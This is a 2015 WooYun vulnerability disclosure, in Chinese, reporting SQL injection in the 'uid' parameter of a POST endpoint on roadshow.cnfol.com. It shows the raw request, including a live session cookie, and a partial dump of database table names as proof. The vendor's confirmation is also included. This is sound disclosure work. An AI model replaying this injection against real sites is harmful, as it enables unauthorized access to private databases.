当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0135884

漏洞标题:中金在线某站存在SQL注入

相关厂商:福建中金在线网络股份有限公司

漏洞作者: 深度安全实验室

提交时间:2015-08-21 16:10

修复时间:2015-10-05 16:40

公开时间:2015-10-05 16:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-21: 细节已通知厂商并且等待厂商处理中
2015-08-21: 厂商已经确认,细节仅向厂商公开
2015-08-31: 细节向核心白帽子及相关领域专家公开
2015-09-10: 细节向普通白帽子公开
2015-09-20: 细节向实习白帽子公开
2015-10-05: 细节向公众公开

简要描述:

详细说明:

POST /show/addquestion/13678 HTTP/1.1
Host: roadshow.cnfol.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://gold.cnfol.com/
Cookie: testroadshow=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2242f4fcec0582447d36b58266cc3b96ed%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%22210.74.157.98%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows+NT+5.1%3B+rv%3A37.0%29+Gecko%2F201001%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1440142289%3B%7D7c8bd01e53effd6ea19f0c799915184b; Hm_lvt_c378c4854ec370c1c8438f72e19b7170=1440142318; Hm_lpvt_c378c4854ec370c1c8438f72e19b7170=1440142318; SUV=1440143183123460; FlowerRewardStatus=ChatAA
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 206
asker=%E5%8C%BF%E5%90%8D%E7%94%A8%E6%88%B7&source=%E9%BB%84%E9%87%91%E7%BD%91%E9%A6%96%E9%A1%B5&question=%E6%96%B9%E6%B3%95%E5%8F%8D%E5%8F%8D%E5%A4%8D%E5%A4%8D%E5%8F%8D%E5%8F%8D%E5%A4%8D%E5%A4%8D&uid=192

uid参数

1.png

漏洞证明:

2399个表,贴一部分:

Database: fol_live
[2399 tables]
+--------------+
| rs_chart     |
| rs_class     |
| rs_corp      |
| rs_info_100  |
| rs_info_1000 |
| rs_info_1001 |
| rs_info_1002 |
| rs_info_1003 |
| rs_info_1004 |
| rs_info_1005 |
| rs_info_1006 |
| rs_info_1007 |
| rs_info_1008 |
| rs_info_1009 |
| rs_info_101  |
| rs_info_1010 |
| rs_info_1011 |
| rs_info_1012 |
| rs_info_1013 |
| rs_info_1014 |
| rs_info_1015 |
| rs_info_1016 |
| rs_info_1017 |
| rs_info_1018 |
| rs_info_1019 |
| rs_info_102  |
| rs_info_1020 |
| rs_info_1021 |
| rs_info_1022 |
| rs_info_1023 |
| rs_info_1024 |
| rs_info_1025 |
| rs_info_1026 |
| rs_info_1027 |
| rs_info_1028 |
| rs_info_1029 |
| rs_info_103  |
| rs_info_1030 |
| rs_info_1031 |
| rs_info_1032 |
| rs_info_1033 |
| rs_info_1034 |
| rs_info_1035 |
| rs_info_1036 |
| rs_info_1037 |
| rs_info_1038 |
| rs_info_1039 |
| rs_info_104  |
| rs_info_1040 |
| rs_info_1041 |
| rs_info_1042 |
| rs_info_1043 |
| rs_info_1044 |
| rs_info_1045 |
| rs_info_1046 |
| rs_info_1047 |
| rs_info_1048 |
| rs_info_1049 |
| rs_info_105  |
| rs_info_1050 |
| rs_info_1051 |
| rs_info_1052 |
| rs_info_1053 |
| rs_info_1054 |
| rs_info_1055 |
| rs_info_1056 |
| rs_info_1057 |
| rs_info_1058 |
| rs_info_1059 |
| rs_info_106  |
| rs_info_1060 |
| rs_info_1061 |
| rs_info_1062 |
| rs_info_1063 |
| rs_info_1064 |
| rs_info_1065 |
| rs_info_1066 |
| rs_info_1067 |
| rs_info_1068 |
| rs_info_1069 |
| rs_info_107  |
| rs_info_1070 |
| rs_info_1071 |
| rs_info_1072 |
| rs_info_1073 |
| rs_info_1074 |
| rs_info_1075 |
| rs_info_1076 |
| rs_info_1077 |
| rs_info_108  |
| rs_info_1082 |
| rs_info_1083 |
| rs_info_1084 |
| rs_info_1085 |
| rs_info_1086 |
| rs_info_1087 |
| rs_info_1088 |
| rs_info_1089 |
| rs_info_109  |
| rs_info_1090 |
| rs_info_1091 |
| rs_info_1092 |
| rs_info_1093 |
| rs_info_1094 |
| rs_info_1095 |
| rs_info_1096 |
| rs_info_1097 |
| rs_info_1098 |
| rs_info_1099 |
| rs_info_110  |
| rs_info_1100 |
| rs_info_1101 |
| rs_info_1102 |
| rs_info_1103 |
| rs_info_1104 |
| rs_info_1105 |
| rs_info_1106 |
| rs_info_1107 |
| rs_info_1108 |
| rs_info_1109 |
| rs_info_111  |
| rs_info_1110 |
| rs_info_1111 |
| rs_info_1112 |
| rs_info_1113 |
| rs_info_1114 |
| rs_info_1115 |
| rs_info_1116 |
| rs_info_1117 |
| rs_info_1118 |
| rs_info_1119 |
| rs_info_1120 |
| rs_info_1121 |
| rs_info_1122 |
| rs_info_1123 |
| rs_info_1124 |
| rs_info_1125 |
| rs_info_1126 |
| rs_info_1127 |
| rs_info_1128 |
| rs_info_1129 |
| rs_info_1130 |
| rs_info_1131 |
| rs_info_1132 |
| rs_info_1133 |
| rs_info_1134 |
| rs_info_1135 |
| rs_info_1136 |
| rs_info_1137 |
| rs_info_1138 |
| rs_info_1139 |
| rs_info_1140 |
| rs_info_1141 |
| rs_info_1142 |
| rs_info_1143 |
| rs_info_1144 |
| rs_info_1145 |
| rs_info_1146 |
| rs_info_1147 |
| rs_info_1149 |
| rs_info_1150 |
| rs_info_1151 |
| rs_info_1152 |
| rs_info_1153 |
| rs_info_1154 |
| rs_info_1155 |
| rs_info_1156 |
| rs_info_1157 |
| rs_info_1158 |
| rs_info_1159 |
| rs_info_1160 |
| rs_info_1161 |
| rs_info_1162 |
| rs_info_1163 |
| rs_info_1164 |
| rs_info_1165 |
| rs_info_1166 |
| rs_info_1167 |
| rs_info_1168 |
| rs_info_1169 |
| rs_info_1170 |
| rs_info_1171 |
| rs_info_1172 |
| rs_info_1173 |
| rs_info_1174 |
| rs_info_1175 |
| rs_info_1176 |
| rs_info_1177 |
| rs_info_1178 |
| rs_info_1179 |
| rs_info_1180 |
| rs_info_1181 |
| rs_info_1182 |
| rs_info_1183 |
| rs_info_1184 |
| rs_info_1185 |
| rs_info_1186 |
| rs_info_1187 |
| rs_info_1188 |
| rs_info_1189 |
| rs_info_1190 |
| rs_info_1191 |
| rs_info_1192 |
| rs_info_1193 |
| rs_info_1194 |
| rs_info_1196 |
| rs_info_1197 |
| rs_info_1199 |
| rs_info_1200 |
| rs_info_1202 |
| rs_info_1203 |
| rs_info_1204 |
| rs_info_1205 |
| rs_info_1206 |
| rs_info_1207 |
| rs_info_1208 |
| rs_info_1209 |
| rs_info_1210 |
| rs_info_1211 |
| rs_info_1212 |
| rs_info_1213 |
| rs_info_1214 |
| rs_info_1215 |
| rs_info_1216 |
| rs_info_1217 |
| rs_info_1218 |
| rs_info_1219 |
| rs_info_1220 |
| rs_info_1221 |
| rs_info_1222 |
| rs_info_1223 |
| rs_info_1224 |
| rs_info_1225 |
| rs_info_1226 |
| rs_info_1227 |
| rs_info_1228 |
| rs_info_1229 |
| rs_info_1230 |
| rs_info_1231 |
| rs_info_1232 |
| rs_info_1233 |
| rs_info_1234 |
| rs_info_1235 |
| rs_info_1236 |
| rs_info_1237 |
| rs_info_1238 |
| rs_info_1239 |
| rs_info_1240 |
| rs_info_1241 |
| rs_info_1242 |
| rs_info_1243 |
| rs_info_1244 |
| rs_info_1245 |
| rs_info_1246 |
| rs_info_1247 |
| rs_info_1248 |
| rs_info_1249 |
| rs_info_1250 |
| rs_info_1251 |

修复方案:

版权声明:转载请注明来源 深度安全实验室@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-08-21 16:38

厂商回复:

感谢提供漏洞信息,我们会立即修复。

最新状态:

暂无